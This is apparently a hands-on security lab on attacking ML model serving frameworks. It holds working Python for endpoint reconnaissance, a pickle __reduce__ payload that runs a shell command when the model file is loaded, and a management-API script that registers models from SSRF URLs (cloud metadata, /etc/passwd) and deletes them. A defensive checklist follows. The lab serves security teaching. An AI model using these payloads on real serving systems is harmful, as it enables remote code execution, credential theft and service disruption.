Lab: Model Serving Framework Attacks
Exploit vulnerabilities in TensorFlow Serving, TorchServe, and Triton Inference Server, targeting model loading, API endpoints, and management interfaces.
Prerequisites
- Docker installed for running serving frameworks
- Understanding of model serialization formats (SavedModel, TorchScript, ONNX)
- Python with
httpx,grpcio, andtorch - Familiarity with REST and gRPC API patterns
pip install httpx grpcio torch torchvision requests python-dotenvBackground
Model serving frameworks are the gateway between trained models and production traffic. Their attack surface includes model loading (deserialization of potentially malicious model files), management APIs (deploying, updating, or deleting models), and inference endpoints (input validation and output handling).
Lab Exercises
Map Serving Framework Attack Surfaces
Deploy multiple serving frameworks and enumerate their exposed interfaces.
#!/usr/bin/env python3 """Reconnaissance against model serving frameworks.""" import httpx FRAMEWORKS = { "torchserve": { "base_url": "http://localhost:8080", "management_url": "http://localhost:8081", "endpoints": [ "/ping", "/models", "/api-description", "/predictions/model_name", "/explanations/model_name", ], "management_endpoints": [ "/models", "/models/model_name", "/models/model_name/1.0/set-default", ], }, "tensorflow_serving": { "base_url": "http://localhost:8501", "endpoints": [ "/v1/models", "/v1/models/model_name", "/v1/models/model_name/metadata", "/v1/models/model_name/versions", ], }, "triton": { "base_url": "http://localhost:8000", "endpoints": [ "/v2/health/ready", "/v2/health/live", "/v2/models", "/v2/models/model_name", "/v2/models/model_name/config", "/v2/models/stats", "/v2/repository/index", ], }, } def recon_framework(name: str, config: dict): """Enumerate endpoints of a serving framework.""" print(f"\n=== {name.upper()} ===") base = config["base_url"] for endpoint in config["endpoints"]: try: resp = httpx.get(f"{base}{endpoint}", timeout=3) status = resp.status_code body = resp.text[:150] print(f" [{status}] {endpoint}") if status == 200: print(f" {body}") except httpx.RequestError: print(f" [---] {endpoint} (unreachable)") # Check management endpoints separately if "management_url" in config: mgmt = config["management_url"] print(f"\n Management API ({mgmt}):") for ep in config.get("management_endpoints", []): try: resp = httpx.get(f"{mgmt}{ep}", timeout=3) print(f" [{resp.status_code}] {ep}") except httpx.RequestError: print(f" [---] {ep}") if __name__ == "__main__": for name, config in FRAMEWORKS.items(): recon_framework(name, config)python serving_recon.pyCraft a Malicious Model File
Demonstrate how serialized model files can contain executable payloads.
#!/usr/bin/env python3 """Demonstrate malicious model file creation. WARNING: This creates a DEMONSTRATION payload that only writes a marker file. Real malicious models could execute arbitrary code.""" import torch import pickle import os class MaliciousModule(torch.nn.Module): """A model that executes code when loaded via pickle.""" def __init__(self): super().__init__() self.linear = torch.nn.Linear(10, 2) def forward(self, x): return self.linear(x) def __reduce__(self): """Override pickle deserialization to execute code.""" # DEMONSTRATION ONLY: creates a harmless marker file cmd = "touch /tmp/model_rce_proof && echo 'RCE demonstrated'" return (os.system, (cmd,)) def create_malicious_pickle(): """Create a pickle file with embedded code execution.""" print("=== Malicious Pickle Model ===") model = MaliciousModule() # Save as pickle (used by many serving frameworks) with open("/tmp/malicious_model.pkl", "wb") as f: pickle.dump(model, f) print(" Created /tmp/malicious_model.pkl") print(" Loading this file will execute: touch /tmp/model_rce_proof") # Verify the attack works print("\n Loading malicious pickle...") with open("/tmp/malicious_model.pkl", "rb") as f: pickle.load(f) if os.path.exists("/tmp/model_rce_proof"): print(" ** RCE CONFIRMED: marker file created **") os.remove("/tmp/model_rce_proof") else: print(" Execution was blocked (safe pickle mode)") def create_safe_model(): """Show how to create a model using safe serialization.""" print("\n=== Safe Model Serialization ===") model = torch.nn.Linear(10, 2) # SafeTensors format: cannot contain executable code try: from safetensors.torch import save_file save_file(model.state_dict(), "/tmp/safe_model.safetensors") print(" Created /tmp/safe_model.safetensors (SafeTensors format)") print(" SafeTensors only stores tensor data, no executable code") except ImportError: print(" Install safetensors: pip install safetensors") # State dict only: also safe torch.save(model.state_dict(), "/tmp/model_state_dict.pt") print(" Created /tmp/model_state_dict.pt (state_dict only)") print(" State dicts require matching architecture to load, limiting attack surface") if __name__ == "__main__": create_malicious_pickle() create_safe_model()python malicious_model.pyAttack Management APIs
Exploit management API endpoints to deploy malicious models or modify configurations.
#!/usr/bin/env python3 """Attack model serving management APIs.""" import httpx import json # TorchServe management API (default: port 8081, often unprotected) TORCHSERVE_MGMT = "http://localhost:8081" def torchserve_list_models(): """List all deployed models via management API.""" try: resp = httpx.get(f"{TORCHSERVE_MGMT}/models", timeout=5) if resp.status_code == 200: models = resp.json() print(f"Deployed models: {json.dumps(models, indent=2)}") return models except httpx.RequestError as e: print(f"Management API unreachable: {e}") return None def torchserve_register_model(url: str, model_name: str): """Register a model from a URL -- potential for SSRF or malicious model loading.""" try: resp = httpx.post( f"{TORCHSERVE_MGMT}/models", params={ "url": url, "model_name": model_name, "initial_workers": 1, }, timeout=30, ) print(f"Register response [{resp.status_code}]: {resp.text[:200]}") return resp.status_code == 200 except httpx.RequestError as e: print(f"Registration failed: {e}") return False def torchserve_delete_model(model_name: str): """Delete a deployed model -- availability attack.""" try: resp = httpx.delete( f"{TORCHSERVE_MGMT}/models/{model_name}", timeout=10, ) print(f"Delete response [{resp.status_code}]: {resp.text}") except httpx.RequestError as e: print(f"Deletion failed: {e}") def test_ssrf_via_model_url(): """Test SSRF through model URL parameter.""" print("\n=== SSRF via Model Registration ===") ssrf_urls = [ "http://169.254.169.254/latest/meta-data/", # AWS metadata "http://metadata.google.internal/", # GCP metadata "http://localhost:8081/models", # Self-referential "file:///etc/passwd", # Local file read ] for url in ssrf_urls: print(f"\n Testing SSRF: {url}") torchserve_register_model(url, "ssrf_test") if __name__ == "__main__": print("=== Model Serving Management API Attack ===\n") torchserve_list_models() test_ssrf_via_model_url()python management_attack.pyImplement Serving Security Controls
Design and verify security controls for model serving deployments.
# Model Serving Security Checklist: # # 1. Model Loading Safety # - Use SafeTensors format instead of pickle/joblib # - Validate model checksums before loading # - Run model loading in sandboxed environments # - Scan model files for embedded code (pickle opcode analysis) # # 2. Management API Protection # - Bind management APIs to localhost or internal networks only # - Require authentication for all management operations # - Implement rate limiting on model registration # - Validate model source URLs against an allowlist # # 3. Inference API Hardening # - Validate input shapes and types before inference # - Set maximum input sizes and batch sizes # - Implement request timeout and cancellation # - Filter error messages to prevent information disclosure # # 4. Network Isolation # - Separate management and inference on different network segments # - Block outbound network from inference containers # - Use TLS for all API communications # - Implement network policies in Kubernetes
Troubleshooting
| Issue | Solution |
|---|---|
| Serving framework fails to start | Check Docker logs: docker logs <container_name> |
| Management API returns 403 | API may be configured for localhost only; test from within the container |
| Malicious model blocked | Some frameworks now include pickle scanning; this is the expected defense |
| SSRF test does not connect | The framework may not follow redirects or may have URL validation |
Related Topics
- Inference Server Exploitation - Complementary infrastructure attacks
- Container Breakout - Escaping the serving container
- ML Pipeline Poisoning - Attacking the pipeline that feeds serving frameworks
- Model Registry Compromise - Substituting models before they reach serving
References
- "Unsafe at any Speed: Exploiting ML Model Serialization" - Hugging Face Security Team (2024) - Analysis of pickle-based model deserialization attacks
- "TorchServe Security Advisory CVE-2023-43654" - PyTorch (2023) - Critical SSRF vulnerability in TorchServe management API
- "Securing ML Model Serving Infrastructure" - Google (2024) - Best practices for serving framework security
- "SafeTensors: A Safer Serialization Format for ML" - Hugging Face (2023) - Safe alternative to pickle-based model storage
Why is pickle-based model serialization particularly dangerous in model serving environments?